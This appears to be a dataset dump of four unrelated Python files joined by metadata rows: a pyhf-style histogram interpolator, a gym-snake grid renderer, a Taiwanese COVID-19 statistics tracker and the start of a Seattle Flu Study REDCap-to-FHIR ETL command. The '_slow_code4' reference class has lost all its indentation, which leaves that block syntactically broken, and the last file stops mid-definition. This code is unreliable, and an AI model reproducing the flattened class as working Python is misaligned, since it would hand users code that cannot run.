        # it is valid only for alpha0 != 0, which the assert above guarantees.
        A_inverse = default_backend.astensor(
            [
                [
                    15.0 / (16 * alpha0),
                    -15.0 / (16 * alpha0),
                    -7.0 / 16.0,
                    -7.0 / 16.0,
                    1.0 / 16 * alpha0,
                    -1.0 / 16.0 * alpha0,
                ],
                [
                    3.0 / (2 * math.pow(alpha0, 2)),
                    3.0 / (2 * math.pow(alpha0, 2)),
                    -9.0 / (16 * alpha0),
                    9.0 / (16 * alpha0),
                    1.0 / 16,
                    1.0 / 16,
                ],
                [
                    -5.0 / (8 * math.pow(alpha0, 3)),
                    5.0 / (8 * math.pow(alpha0, 3)),
                    5.0 / (8 * math.pow(alpha0, 2)),
                    5.0 / (8 * math.pow(alpha0, 2)),
                    -1.0 / (8 * alpha0),
                    1.0 / (8 * alpha0),
                ],
                [
                    3.0 / (-2 * math.pow(alpha0, 4)),
                    3.0 / (-2 * math.pow(alpha0, 4)),
                    -7.0 / (-8 * math.pow(alpha0, 3)),
                    7.0 / (-8 * math.pow(alpha0, 3)),
                    -1.0 / (8 * math.pow(alpha0, 2)),
                    -1.0 / (8 * math.pow(alpha0, 2)),
                ],
                [
                    3.0 / (16 * math.pow(alpha0, 5)),
                    -3.0 / (16 * math.pow(alpha0, 5)),
                    -3.0 / (16 * math.pow(alpha0, 4)),
                    -3.0 / (16 * math.pow(alpha0, 4)),
                    1.0 / (16 * math.pow(alpha0, 3)),
                    -1.0 / (16 * math.pow(alpha0, 3)),
                ],
                [
                    1.0 / (2 * math.pow(alpha0, 6)),
                    1.0 / (2 * math.pow(alpha0, 6)),
                    -5.0 / (16 * math.pow(alpha0, 5)),
                    5.0 / (16 * math.pow(alpha0, 5)),
                    1.0 / (16 * math.pow(alpha0, 4)),
                    1.0 / (16 * math.pow(alpha0, 4)),
                ],
            ]
        )
        # b holds the values and the first and second log-derivatives of the
        # up/down variations evaluated at +/- alpha0 (the boundary conditions).
        b = default_backend.stack(
            [
                deltas_up_alpha0 - self._broadcast_helper,
                deltas_dn_alpha0 - self._broadcast_helper,
                default_backend.log(self._deltas_up) * deltas_up_alpha0,
                -default_backend.log(self._deltas_dn) * deltas_dn_alpha0,
                default_backend.power(default_backend.log(self._deltas_up), 2)
                * deltas_up_alpha0,
                default_backend.power(default_backend.log(self._deltas_dn), 2)
                * deltas_dn_alpha0,
            ]
        )
        # Polynomial coefficients a_1..a_6 per (systematic, histogram, bin).
        self._coefficients = default_backend.einsum(
            'rc,shb,cshb->rshb', A_inverse, self._broadcast_helper, b
        )
        self._precompute()
        if subscribe:
            events.subscribe('tensorlib_changed')(self._precompute)
    def _precompute(self):
        """Transfer the precomputed constants to the currently active tensor backend."""
        tensorlib, _ = get_backend()
        self.deltas_up = tensorlib.astensor(self._deltas_up)
        self.deltas_dn = tensorlib.astensor(self._deltas_dn)
        self.broadcast_helper = tensorlib.astensor(self._broadcast_helper)
        self.alpha0 = tensorlib.astensor(self._alpha0)
        self.coefficients = tensorlib.astensor(self._coefficients)
        self.bases_up = tensorlib.einsum(
            'sa,shb->shab', tensorlib.ones(self.alphasets_shape), self.deltas_up
        )
        self.bases_dn = tensorlib.einsum(
            'sa,shb->shab', tensorlib.ones(self.alphasets_shape), self.deltas_dn
        )
        self.mask_on = tensorlib.ones(self.alphasets_shape)
        self.mask_off = tensorlib.zeros(self.alphasets_shape)
        self.ones = tensorlib.einsum(
            'sa,shb->shab', self.mask_on, self.broadcast_helper
        )
    def _precompute_alphasets(self, alphasets_shape):
        """Rebuild the cached alpha-shaped tensors when the alphasets shape changes."""
        if alphasets_shape == self.alphasets_shape:
            return
        tensorlib, _ = get_backend()
        self.alphasets_shape = alphasets_shape
        self.bases_up = tensorlib.einsum(
            'sa,shb->shab', tensorlib.ones(self.alphasets_shape), self.deltas_up
        )
        self.bases_dn = tensorlib.einsum(
            'sa,shb->shab', tensorlib.ones(self.alphasets_shape), self.deltas_dn
        )
        self.mask_on = tensorlib.ones(self.alphasets_shape)
        self.mask_off = tensorlib.zeros(self.alphasets_shape)
        self.ones = tensorlib.einsum(
            'sa,shb->shab', self.mask_on, self.broadcast_helper
        )
        return
    def __call__(self, alphasets):
        """Compute Interpolated Values."""
        tensorlib, _ = get_backend()
        self._precompute_alphasets(tensorlib.shape(alphasets))
        # select where alpha >= alpha0 and produce the mask
        where_alphasets_gtalpha0 = tensorlib.where(
            alphasets >= self.__alpha0, self.mask_on, self.mask_off
        )
        masks_gtalpha0 = tensorlib.astensor(
            tensorlib.einsum(
                'sa,shb->shab', where_alphasets_gtalpha0, self.broadcast_helper
            ),
            dtype="bool",
        )
        # select where alpha > -alpha0 ["not(alpha <= -alpha0)"] and produce the mask
        where_alphasets_not_ltalpha0 = tensorlib.where(
            alphasets > -self.__alpha0, self.mask_on, self.mask_off
        )
        masks_not_ltalpha0 = tensorlib.astensor(
            tensorlib.einsum(
                'sa,shb->shab', where_alphasets_not_ltalpha0, self.broadcast_helper
            ),
            dtype="bool",
        )
        # s: set under consideration (i.e. the modifier)
        # a: alpha variation
        # h: histogram affected by modifier
        # b: bin of histogram
        exponents = tensorlib.einsum(
            'sa,shb->shab', tensorlib.abs(alphasets), self.broadcast_helper
        )
        # for |alpha| >= alpha0, we want to raise the bases to the exponent=alpha
        # and for |alpha| < alpha0, we want to raise the bases to the exponent=1
        masked_exponents = tensorlib.where(
            exponents >= self.__alpha0, exponents, self.ones
        )
        # we need to produce the terms of alpha^i for summing up
        alphasets_powers = tensorlib.stack(
            [
                alphasets,
                tensorlib.power(alphasets, 2),
                tensorlib.power(alphasets, 3),
                tensorlib.power(alphasets, 4),
                tensorlib.power(alphasets, 5),
                tensorlib.power(alphasets, 6),
            ]
        )
        # this is the 1 + sum_i a_i alpha^i
        value_btwn = tensorlib.ones(exponents.shape) + tensorlib.einsum(
            'rshb,rsa->shab', self.coefficients, alphasets_powers
        )
        # first, build a result where:
        #       alpha > alpha0     : fill with bases_up
        #   not(alpha > alpha0)    : fill with 1 + sum(a_i alpha^i)
        results_gtalpha0_btwn = tensorlib.where(
            masks_gtalpha0, self.bases_up, value_btwn
        )
        # then, build a result where:
        #      alpha >= -alpha0    : do nothing (fill with previous result)
        #  not(alpha >= -alpha0): fill with bases_dn
        bases = tensorlib.where(
            masks_not_ltalpha0, results_gtalpha0_btwn, self.bases_dn
        )
        return tensorlib.power(bases, masked_exponents)
class _slow_code4:
"""
Reference Implementation of Code 4.
delta_up^alpha0 = 1 + a1 alpha0 + a2 alpha0^2 + a3 alpha0^3 + a4 alpha0^4 + a5 alpha0^5 + a6 alpha0^6
delta_down^alpha0 = 1 - a1 alpha0 + a2 alpha0^2 - a3 alpha0^3 + a4 alpha0^4 - a5 alpha0^5 + a6 alpha0^6
f[alpha_] := 1 + a1 * alpha + a2 * alpha^2 + a3 * alpha^3 + a4 * alpha^4 + a5 * alpha^5 + a6 * alpha^6
up[alpha_] := delta_up^alpha
down[alpha_] := delta_down^(-alpha)
We want to find the coefficients a1, a2, a3, a4, a5, a6 by solving:
f[alpha0] == up[alpha0]
f[-alpha0] == down[-alpha0]
f'[alpha0] == up'[alpha0]
f'[-alpha0] == down'[-alpha0]
f''[alpha0] == up''[alpha0]
f''[-alpha0] == down''[-alpha0]
Treating this as multiplication with a rank-6 matrix A: A*x = b, where x = [a1, a2, a3, a4, a5, a6]
[alpha0, alpha0^2, alpha0^3, alpha0^4, alpha0^5, alpha0^6 ] [a1] = [ delta_up^(alpha0) - 1 ]
[-alpha0, alpha0^2, -alpha0^3, alpha0^4, -alpha0^5, alpha0^6 ] [a2] = [ delta_down^(alpha0) - 1 ]
[1, 2alpha0, 3alpha0^2, 4alpha0^3, 5alpha0^4, 6alpha0^5 ] [a3] = [ ln(delta_up) delta_up^(alpha0) ]
[1, -2alpha0, 3alpha0^2, -4alpha0^3, 5alpha0^4, -6alpha0^5] [a4] = [ - ln(delta_down) delta_down^(alpha0) ]
[0, 2, 6alpha0, 12alpha0^2, 20alpha0^3, 30alpha0^4] [a5] = [ ln(delta_up)^2 delta_up^(alpha0) ]
[0, 2, -6alpha0, 12alpha0^2, -20alpha0^3, 30alpha0^4] [a6] = [ ln(delta_down)^2 delta_down^(alpha0) ]
The determinant of this matrix is -2048*alpha0^15. The trace is 30*alpha0^4+16*alpha0^3+4*alpha0^2+alpha0. Therefore, this matrix is invertible if and only if alpha0 != 0.
The inverse of this matrix is (and verifying with http://wims.unice.fr/~wims/wims.cgi)
[15/(16*alpha0), -15/(16*alpha0), -7/16, -7/16, 1/16*alpha0, -1/16*alpha0 ]
[3/(2*alpha0^2), 3/(2*alpha0^2), -9/(16*alpha0), 9/(16*alpha0), 1/16, 1/16 ]
[-5/(8*alpha0^3), 5/(8*alpha0^3), 5/(8*alpha0^2), 5/(8*alpha0^2), -1/(8*alpha0), 1/(8*alpha0) ]
[3/(-2*alpha0^4), 3/(-2*alpha0^4), -7/(-8*alpha0^3), 7/(-8*alpha0^3), -1/(8*alpha0^2), -1/(8*alpha0^2) ]
[3/(16*alpha0^5), -3/(16*alpha0^5), -3/(16*alpha0^4), -3/(16*alpha0^4), 1/(16*alpha0^3), -1/(16*alpha0^3)]
[1/(2*alpha0^6), 1/(2*alpha0^6), -5/(16*alpha0^5), 5/(16*alpha0^5), 1/(16*alpha0^4), 1/(16*alpha0^4) ]
"""
def product(self, down, nom, up, alpha):
delta_up = up / nom
delta_down = down / nom
if alpha >= self.alpha0:
delta = math.pow(delta_up, alpha)
elif -self.alpha0 < alpha < self.alpha0:
delta_up_alpha0 = math.pow(delta_up, self.alpha0)
delta_down_alpha0 = math.pow(delta_down, self.alpha0)
b = [
delta_up_alpha0 - 1,
delta_down_alpha0 - 1,
math.log(delta_up) * delta_up_alpha0,
-math.log(delta_down) * delta_down_alpha0,
math.pow(math.log(delta_up), 2) * delta_up_alpha0,
math.pow(math.log(delta_down), 2) * delta_down_alpha0,
]
A_inverse = [
[
15.0 / (16 * self.alpha0),
-15.0 / (16 * self.alpha0),
-7.0 / 16.0,
-7.0 / 16.0,
1.0 / 16 * self.alpha0,
-1.0 / 16.0 * self.alpha0,
],
[
3.0 / (2 * math.pow(self.alpha0, 2)),
3.0 / (2 * math.pow(self.alpha0, 2)),
-9.0 / (16 * self.alpha0),
9.0 / (16 * self.alpha0),
1.0 / 16,
1.0 / 16,
],
[
-5.0 / (8 * math.pow(self.alpha0, 3)),
5.0 / (8 * math.pow(self.alpha0, 3)),
5.0 / (8 * math.pow(self.alpha0, 2)),
5.0 / (8 * math.pow(self.alpha0, 2)),
-1.0 / (8 * self.alpha0),
1.0 / (8 * self.alpha0),
],
[
3.0 / (-2 * math.pow(self.alpha0, 4)),
3.0 / (-2 * math.pow(self.alpha0, 4)),
-7.0 / (-8 * math.pow(self.alpha0, 3)),
7.0 / (-8 * math.pow(self.alpha0, 3)),
-1.0 / (8 * math.pow(self.alpha0, 2)),
-1.0 / (8 * math.pow(self.alpha0, 2)),
],
[
3.0 / (16 * math.pow(self.alpha0, 5)),
-3.0 / (16 * math.pow(self.alpha0, 5)),
-3.0 / (16 * math.pow(self.alpha0, 4)),
-3.0 / (16 * math.pow(self.alpha0, 4)),
1.0 / (16 * math.pow(self.alpha0, 3)),
-1.0 / (16 * math.pow(self.alpha0, 3)),
],
[
1.0 / (2 * math.pow(self.alpha0, 6)),
1.0 / (2 * math.pow(self.alpha0, 6)),
-5.0 / (16 * math.pow(self.alpha0, 5)),
5.0 / (16 * math.pow(self.alpha0, 5)),
1.0 / (16 * math.pow(self.alpha0, 4)),
1.0 / (16 * math.pow(self.alpha0, 4)),
],
]
coefficients = [
sum(A_i * b_j for A_i, b_j in zip(A_row, b)) for A_row in A_inverse
]
delta = 1
for i in range(1, 7):
delta += coefficients[i - 1] * math.pow(alpha, i)
else:
delta = math.pow(delta_down, (-alpha))
return delta
def __init__(self, histogramssets, subscribe=True, alpha0=1):
self._histogramssets = histogramssets
self.alpha0 = alpha0
    def __call__(self, alphasets):
        """Interpolate every histogram set at each alpha in *alphasets*.

        Converts *alphasets* to plain lists, loops over them with
        ``_slow_interpolator_looper`` using ``self.product`` as the per-value
        interpolation function, and returns the result as a backend tensor.
        """
        tensorlib, _ = get_backend()
        return tensorlib.astensor(
            _slow_interpolator_looper(
                self._histogramssets, tensorlib.tolist(alphasets), self.product
            )
        )
| 2.25 | 2 |
gym_snake/envs/grid/square_grid.py | telmo-correa/gym-snake | 2 | 12757405 | from gym_snake.envs.constants import Action4, Direction4
from gym_snake.envs.grid.base_grid import BaseGrid
class SquareGrid(BaseGrid):
    """Snake grid on a square lattice with 4-directional movement.

    Rendering draws square tiles for snakes and circles for apples onto an
    external renderer object *r* (push/pop, scale, fillRect, drawLine, ...).
    """
    def __init__(self, *args, **kwargs):
        super(SquareGrid, self).__init__(*args, **kwargs)
    def get_forward_action(self):
        """Return the 'keep going straight' action of the 4-action space."""
        return Action4.forward
    def get_random_direction(self):
        """Sample one of the four cardinal directions uniformly at random."""
        return Direction4(self.np_random.randint(0, len(Direction4)))
    def get_renderer_dimensions(self, tile_size):
        """Return (width_px, height_px) of the rendered grid at *tile_size*."""
        return self.width * tile_size, self.height * tile_size
    def render(self, r, tile_size, cell_pixels):
        """Draw background, grid lines, snakes and apples onto renderer *r*.

        *r* must already have exactly the dimensions reported by
        get_renderer_dimensions() — asserted below.
        """
        r_width, r_height = self.get_renderer_dimensions(tile_size)
        assert r.width == r_width
        assert r.height == r_height
        # Total grid size at native scale
        width_px = self.width * cell_pixels
        height_px = self.height * cell_pixels
        r.push()
        # Internally, we draw at the "large" full-grid resolution, but we
        # use the renderer to scale back to the desired size
        r.scale(tile_size / cell_pixels, tile_size / cell_pixels)
        # Draw the background of the in-world cells black
        r.fillRect(
            0,
            0,
            width_px,
            height_px,
            0, 0, 0
        )
        # Draw grid lines
        r.setLineColor(100, 100, 100)
        r.setLineWidth(cell_pixels / tile_size)
        for rowIdx in range(0, self.height):
            y = cell_pixels * rowIdx
            r.drawLine(0, y, width_px, y)
        for colIdx in range(0, self.width):
            x = cell_pixels * colIdx
            r.drawLine(x, 0, x, height_px)
        # Render the objects: squares for snake segments, circles for apples.
        snake_cell_renderer = SquareGrid._square_cell_renderer(r, cell_pixels)
        for snake in self.snakes:
            snake.render(snake_cell_renderer)
        apple_cell_renderer = SquareGrid._circle_cell_renderer(r, cell_pixels)
        self.apples.render(apple_cell_renderer)
        r.pop()
    @staticmethod
    def _square_cell_renderer(r, cell_pixels):
        """Return a callable painting a filled square at grid position *p*."""
        points = (
            (0, cell_pixels),
            (cell_pixels, cell_pixels),
            (cell_pixels, 0),
            (0, 0)
        )
        def cell_renderer(p, color):
            x, y = p
            r.push()
            r.setLineColor(*color)
            r.setColor(*color)
            r.translate(x * cell_pixels, y * cell_pixels)
            r.drawPolygon(points)
            r.pop()
        return cell_renderer
    @staticmethod
    def _circle_cell_renderer(r, cell_pixels):
        """Return a callable painting a filled circle at grid position *p*."""
        center_coordinate = cell_pixels / 2
        # Circle radius is 10/32 of a cell, leaving a visible margin.
        circle_r = cell_pixels * 10 / 32
        def cell_renderer(p, color):
            x, y = p
            r.push()
            r.setLineColor(*color)
            r.setColor(*color)
            r.translate(x * cell_pixels, y * cell_pixels)
            r.drawCircle(center_coordinate, center_coordinate, circle_r)
            r.pop()
        return cell_renderer
| 2.828125 | 3 |
covid19_tracker_taiwan.py | josephhuang08/Covid19_Tracker_Taiwan | 0 | 12757406 | <reponame>josephhuang08/Covid19_Tracker_Taiwan<filename>covid19_tracker_taiwan.py
import requests
import util
from datetime import datetime, timedelta
'''
data from 政府資料開放平台 衛生福利部疾病管制署
https://data.gov.tw/dataset/120711
Json query example:
{
"確定病名": "嚴重特殊傳染性肺炎",
"個案研判日": "2020/01/22",
"縣市": "空值",
"鄉鎮": "空值",
"性別": "女",
"是否為境外移入": "是",
"年齡層": "55-59",
"確定病例數": "1"
}
'''
def sort_by_location(case_list):
    """Aggregate confirmed-case counts by city and district.

    Returns a nested dict of the form
    {city: {'總共': total, district1: n1, district2: n2, ...}, ...}
    where '總共' accumulates the city-wide total.
    """
    totals = {}
    for entry in case_list:
        city_name = entry.get('縣市')
        district_name = entry.get('鄉鎮')
        count = int(entry.get('確定病例數'))
        # Lazily create the city bucket (with its running total) and the
        # district counter on first sight.
        city_bucket = totals.setdefault(city_name, {'總共': 0})
        city_bucket.setdefault(district_name, 0)
        city_bucket['總共'] += count
        city_bucket[district_name] += count
    return totals
def print_by_location(city_district):
    """Print per-city totals followed by district counts, 5 per row.

    *city_district* is the nested dict produced by sort_by_location().
    The pseudo-city '空值' gets an explanatory footnote (cases confirmed at
    the airport/quarantine without city information).
    """
    for key, value in city_district.items():
        print('{} 總確診: {}人'.format(key, value['總共']))
        print('----------------------')
        # '總共' was inserted first, so start=-1 gives it index -1 and the
        # real districts are numbered 0, 1, 2, ...  (The original code also
        # reset a `count` variable here and after each row break; both
        # assignments were dead — enumerate() rebinds `count` every
        # iteration — so they have been removed.)
        for count, district in enumerate(city_district[key].keys(), start=-1):
            if district != '總共':
                # Break the row before the 6th, 11th, ... district.
                if count % 5 == 0 and count != 0:
                    print('\n')
                print('{}: {:>4}\t'.format(district, city_district[key][district]), end='')
        if key == '空值':
            print('\n*空值為本土疫情爆發前境外移入病例多於機場或\n集中檢疫所採檢確診並即隔離治療,故未標示其縣市資訊。\naka官方沒給資料', end='')
        print('\n\n')
def sort_by_gender(case_list):
    """Tally confirmed cases by '性別'.

    Returns {'男': n, '女': m}; records with any other gender value are
    ignored, matching the source data's two categories.
    """
    tally = {'男': 0, '女': 0}
    for entry in case_list:
        sex = entry.get('性別')
        if sex in tally:
            tally[sex] += int(entry.get('確定病例數'))
    return tally
def print_by_gender(gender_count):
    """Print the overall total and the male/female breakdown."""
    males = gender_count['男']
    females = gender_count['女']
    print('總確診: {}人\n分別為 男性: {}人\t女性: {}人'.format(
        males + females, males, females))
def sort_by_age(case_list):
    """Tally confirmed cases by age group.

    Each '年齡層' label is reduced to an int key: single ages '0'..'4' map
    to themselves, '70+' maps to 70, and ranges like '55-59' map to their
    lower bound (55).  Returns {lower_bound: case_count}.
    """
    buckets = {}
    for entry in case_list:
        label = entry.get('年齡層')
        if '+' in label:
            lower = 70
        elif '-' in label:
            lower = int(label.split('-')[0])
        else:
            # Single-character labels: the individual ages 0 through 4.
            lower = int(label)
        buckets[lower] = buckets.get(lower, 0) + int(entry.get('確定病例數'))
    return buckets
def print_by_age(results):
    """Print case counts per age bucket, highest bucket first.

    Keys are the lower bounds produced by sort_by_age(): single years 0-4,
    5-year buckets (5, 10, ..., 65), and 70 meaning '70+'.
    """
    print('年齡層\t 確診')
    print('------\t ----')
    for key, value in sorted(results.items(), reverse=True):
        if key < 5:
            print('{}\t{:>5}'.format(key, value))
        elif key == 70:
            print('{}+\t{:>5}'.format(key, value))
        else:
            # Buckets are 5 years wide, so a bucket starting at `key` ends at
            # key + 4 (e.g. 55-59), matching the '年齡層' labels in the source
            # data.  The previous key + 5 printed overlapping ranges (55-60).
            print('{}-{}\t{:>5}'.format(key, key + 4, value))
def sort_by_date(case_list):
    """Tally local ('本土案例') vs imported ('境外移入') cases per month and day.

    Returns (months, days): dicts keyed by 'YYYY/MM' and 'YYYY/MM/DD'
    respectively, each mapping to {'本土案例': n, '境外移入': m}.
    """
    days = {}
    months = {}
    for entry in case_list:
        day_key = entry.get('個案研判日')      # 'YYYY/MM/DD'
        month_key = day_key[:-3]               # 'YYYY/MM'
        count = int(entry.get('確定病例數'))
        kind = '境外移入' if entry['是否為境外移入'] == '是' else '本土案例'
        # Record the case in both the daily and the monthly table.
        for table, key in ((days, day_key), (months, month_key)):
            if key not in table:
                table[key] = {'本土案例': 0, '境外移入': 0}
            table[key][kind] += count
    return months, days
def print_by_date(months, days):
    """Print each month's header followed by that month's daily breakdown.

    *months* and *days* are the two tables returned by sort_by_date().
    """
    for month_key, month_counts in months.items():
        year, month = month_key.split('/')
        print('{}年{}月: [本土案例 {}\t境外移入 {}]'.format(
            year, month, month_counts['本土案例'], month_counts['境外移入']))
        print('-----------')
        # Walk every day and keep only those belonging to this month.
        for day_key, day_counts in days.items():
            if day_key[:-3] != month_key:
                continue
            print('{}日: 本土案例 {:>3}\t境外移入 {:>2}'.format(
                day_key[-2:], day_counts['本土案例'], day_counts['境外移入']))
        print('')
def summary_today(case_list):
    """Print a one-day summary: totals, per-location and per-age breakdowns.

    NOTE(review): takes the *first* entry of sort_by_date()'s day table as
    "the day", so *case_list* is presumably already filtered to a single
    date by the caller — verify against get_results().
    """
    # get data for today from sort_by_date()
    _, day = sort_by_date(case_list)
    key, value = list(day.items())[0]
    total_case_num = value['本土案例'] + value['境外移入']
    print('{} 疫情資料\n---------------------'.format(key))
    print('總確診: {}\t[本土案例: {} 境外移入: {}]\n'.format(total_case_num, value['本土案例'], value['境外移入']))
    city_district = sort_by_location(case_list)
    print_by_location(city_district)
    age_groups = sort_by_age(case_list)
    print_by_age(age_groups)
def average_xdays(case_list, x):
    """Print average daily case counts over the last *x* days.

    Averages are computed as (sum over *case_list*) / x, overall and per
    city / age group.  The date range printed is derived from today's date,
    so *case_list* is presumably pre-filtered to the same window — confirm
    against the caller.
    """
    # count the average case number of x days
    l_sum, f_sum = 0, 0
    _, days = sort_by_date(case_list)
    for value in days.values():
        l_sum += value['本土案例']
        f_sum += value['境外移入']
    l_avg, f_avg = l_sum / x, f_sum / x
    t_avg = l_avg + f_avg
    # get date(yyyy/mm/dd) of first and last day
    first = (datetime.today() - timedelta(x)).strftime('%Y/%m/%d')
    last = (datetime.today() - timedelta(1)).strftime('%Y/%m/%d')
    print('[{} - {}] {}天的平均確診數'.format(first, last, x))
    print('-----------------------------------------')
    print('每日平均確診: {:.2f}\t[本土案例: {:.2f} 境外移入: {:.2f}]\n'.format(t_avg, l_avg, f_avg))
    # get the x day average for each city
    print('各縣市\n------')
    city_district = sort_by_location(case_list)
    for key, value in city_district.items():
        c_avg = int(value['總共']) / x
        print('{}:\t{:>5.2f}'.format(key, c_avg))
    print('')
    # get the x day average for each age group; the counts are replaced
    # in-place by their rounded averages before printing.
    age_groups = sort_by_age(case_list)
    for key, value in age_groups.items():
        value = round(value / x, 2)
        age_groups.update({key: value})
    print_by_age(age_groups)
def get_results(choice, data, first):
    '''
    Handle the user's menu *choice* with the corresponding functions.

    Prints the results and, on the first pass, replays the same call via
    util.write_to_txt() to also write them to a txt file.  *first*
    distinguishes the interactive pass (prompts for dates, filters *data*)
    from the replay pass.
    '''
    if choice == 1: #昨日疫情資料
        if first:
            input_date = (datetime.today() - timedelta(1)).strftime('%Y/%m/%d')
            data = util.get_subset(data, input_date)
        if data:
            summary_today(data)
        else:
            print('昨日資料尚未發布')
    elif choice == 2: #近x日平均數據
        if first:
            x = int(input('輸入(x): '))
            input_date = (datetime.today() - timedelta(x)).strftime('%Y/%m/%d')
            data = util.get_subset(data, input_date)
        # NOTE(review): x/input_date are only bound when first is True; this
        # branch is never replayed with first=False (the write_to_txt call at
        # the bottom explicitly excludes choice 2) — confirm.
        average_xdays(data, x)
        util.write_to_txt(average_xdays, input_date, data, x)
    else:
        if first:
            # get a subset of data using user's input date
            input_date = input('輸入日期 格式[yyyy/mm/dd] (查看所有歷史資料輸入 0): ')
            print('')
            if input_date != '0':
                data = util.get_subset(data, input_date)
        if data:
            if choice == 3: #縣市與鄉鎮
                results = sort_by_location(data)
                print_by_location(results)
            if choice == 4: #性別
                results = sort_by_gender(data)
                print_by_gender(results)
            if choice == 5: #年齡層
                results = sort_by_age(data)
                print_by_age(results)
            if choice == 6: #日期
                months, days = sort_by_date(data)
                print_by_date(months, days)
        else:
            print('無資料,檢查輸入日期有無誤。')
    if first and choice != 2:
        util.write_to_txt(get_results, input_date, choice, data, False)
def main():
    """Fetch the CDC COVID-19 dataset and run the interactive menu loop."""
    # get data and convert to json
    res = requests.get('https://od.cdc.gov.tw/eic/Day_Confirmation_Age_County_Gender_19CoV.json')
    data = res.json()
    while True:
        # choose content
        print('\n本資料集每日依系統固定排程更新一次,呈現截至前一日之統計資訊。')
        print('1 - 昨日疫情資料')
        print('2 - 近x日平均數據\n')
        print('依類別收尋資料:')
        print('3 - 縣市與鄉鎮')
        print('4 - 性別&總確診數')
        print('5 - 年齡層')
        print('6 - 日期')
        print('9 - 中斷程式')
        choice = int(input('輸入: '))
        if choice == 9:
            break
        get_results(choice, data, True)
if __name__ == '__main__':
    main()
lib/seattleflu/id3c/cli/command/etl/redcap_det_asymptomatic_swab_n_send.py | seattleflu/id3c-customizations | 4 | 12757407 | """
Process REDCap DETs that are specific to the
Seattle Flu Study - Swab and Send - Asymptomatic Enrollments
"""
import re
import click
import json
import logging
from uuid import uuid4
from typing import Any, Callable, Dict, List, Mapping, Match, Optional, Union, Tuple
from datetime import datetime
from cachetools import TTLCache
from id3c.db.session import DatabaseSession
from id3c.cli.redcap import Record as REDCapRecord
from id3c.cli.command.etl import redcap_det
from id3c.cli.command.geocode import get_geocoded_address
from id3c.cli.command.location import location_lookup
from seattleflu.id3c.cli.command import age_ceiling
from .redcap_map import *
from .fhir import *
from . import race, first_record_instance, required_instruments
LOG = logging.getLogger(__name__)
REVISION = 2
REDCAP_URL = 'https://redcap.iths.org/'
INTERNAL_SYSTEM = "https://seattleflu.org"
UW_CENSUS_TRACT = '53033005302'
PROJECT_ID = 20190
REQUIRED_INSTRUMENTS = [
'consent_form',
'shipping_information',
'back_end_mail_scans',
'day_0_enrollment_questionnaire',
'post_collection_data_entry_qc'
]
@redcap_det.command_for_project(
    "asymptomatic-swab-n-send",
    redcap_url = REDCAP_URL,
    project_id = PROJECT_ID,
    revision = REVISION,
    help = __doc__)
@first_record_instance
@required_instruments(REQUIRED_INSTRUMENTS)
def redcap_det_asymptomatic_swab_n_send(*, db: DatabaseSession, cache: TTLCache, det: dict, redcap_record: REDCapRecord) -> Optional[dict]:
    """
    Build a FHIR Bundle (locations, patient, encounter, questionnaire
    response, specimen, specimen observation) from one REDCap record.

    Returns None — skipping the enrollment — when a patient, encounter or
    specimen cannot be constructed from the record.
    """
    location_resource_entries = locations(db, cache, redcap_record)
    patient_entry, patient_reference = create_patient(redcap_record)
    if not patient_entry:
        LOG.warning("Skipping enrollment with insufficient information to construct patient")
        return None
    encounter_entry, encounter_reference = create_encounter(redcap_record, patient_reference, location_resource_entries)
    if not encounter_entry:
        LOG.warning("Skipping enrollment with insufficient information to construct an encounter")
        return None
    questionnaire_entry = create_questionnaire_response(redcap_record, patient_reference, encounter_reference)
    specimen_entry, specimen_reference = create_specimen(redcap_record, patient_reference)
    if not specimen_entry:
        LOG.warning("Skipping enrollment with insufficent information to construct a specimen")
        return None
    specimen_observation_entry = create_specimen_observation_entry(specimen_reference, patient_reference, encounter_reference)
    # Entries that came back None (e.g. questionnaire) are filtered out of
    # the final bundle below.
    resource_entries = [
        patient_entry,
        encounter_entry,
        questionnaire_entry,
        specimen_entry,
        *location_resource_entries,
        specimen_observation_entry
    ]
    return create_bundle_resource(
        bundle_id = str(uuid4()),
        timestamp = datetime.now().astimezone().isoformat(),
        source = f"{REDCAP_URL}{PROJECT_ID}/{redcap_record['record_id']}",
        entries = list(filter(None, resource_entries))
    )
def locations(db: DatabaseSession, cache: TTLCache, record: dict) -> list:
    """ Creates a list of Location resource entries from a REDCap record.

    Geocodes the home address, then returns [census-tract entry, address
    entry], with the address identified only by a hash of its canonicalized
    form (not the raw address) and linked to its tract.
    """
    housing_type = 'residence'
    address = {
        'street': record['home_street'],
        'secondary': None,
        'city': record['homecity_other'],
        'state': record['home_state'],
        'zipcode': record['home_zipcode_2'],
    }
    lat, lng, canonicalized_address = get_geocoded_address(address, cache)
    if not canonicalized_address:
        return []  # TODO: decide how un-geocodable addresses should be handled
    tract_location = residence_census_tract(db, (lat, lng), housing_type)
    # TODO what if tract_location is null?
    tract_full_url = generate_full_url_uuid()
    tract_entry = create_resource_entry(tract_location, tract_full_url)
    address_hash = generate_hash(canonicalized_address)
    address_location = create_location(
        f"{INTERNAL_SYSTEM}/location/address",
        address_hash,
        housing_type,
        tract_full_url
    )
    address_entry = create_resource_entry(address_location, generate_full_url_uuid())
    return [tract_entry, address_entry]
def create_location(system: str, value: str, location_type: str, parent: str=None) -> dict:
    """ Returns a FHIR Location resource.

    *location_type* must be one of the keys in the map below; an unknown
    type raises KeyError.  When *parent* is given it becomes the resource's
    partOf reference.
    """
    location_type_system = "http://terminology.hl7.org/CodeSystem/v3-RoleCode"
    location_type_map = {
        "residence": "PTRES",
        "school": "SCHOOL",
        "work": "WORK",
        "site": "HUSCS",
        "lodging": "PTLDG",
    }
    location_type_cc = create_codeable_concept(location_type_system,
                                               location_type_map[location_type])
    location_identifier = create_identifier(system, value)
    part_of = None
    if parent:
        part_of = create_reference(reference_type="Location", reference=parent)
    return create_location_resource([location_type_cc], [location_identifier], part_of)
def create_patient(record: dict) -> tuple:
    """ Returns a FHIR Patient resource entry and reference.

    The patient is identified only by a hash of name, gender, birth date
    and postal code — no direct identifiers are stored.
    """
    gender = map_sex(record["sex"])
    patient_id = generate_patient_hash(
        names = (record['participant_first_name'], record['participant_last_name']),
        gender = gender,
        birth_date = record['birthday'],
        postal_code = record['home_zipcode_2'])
    if not patient_id:
        # Some piece of information was missing, so we couldn't generate a
        # hash.  Fallback to treating this individual as always unique by using
        # the REDCap record id.
        patient_id = generate_hash(f"{REDCAP_URL}{PROJECT_ID}/{record['record_id']}")
    LOG.debug(f"Generated individual identifier {patient_id}")
    patient_identifier = create_identifier(f"{INTERNAL_SYSTEM}/individual", patient_id)
    patient_resource = create_patient_resource([patient_identifier], gender)
    return create_entry_and_reference(patient_resource, "Patient")
def create_encounter(record: REDCapRecord, patient_reference: dict, locations: list) -> tuple:
